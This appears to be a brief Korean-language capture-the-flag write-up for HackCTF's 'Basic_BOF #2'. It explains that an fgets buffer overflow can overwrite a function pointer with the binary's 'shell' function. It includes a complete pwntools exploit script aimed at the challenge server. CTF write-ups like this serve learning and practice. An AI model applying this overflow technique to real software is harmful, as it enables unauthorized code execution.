HackCTF - Basic_BOF #2

 

 

v5에는 sup이라는 함수가 들어있는거 같고

 

fgets 에서 오버플로우로 shell 함수로 덮을 수 있다

 

from pwn import * 

r = remote('ctf.j0n9hyun.xyz', 3001)
e = ELF('./bof_basic2')

payload = 'A'*(128)
payload += p32(e.sym['shell'])

r.sendline(payload)

r.interactive()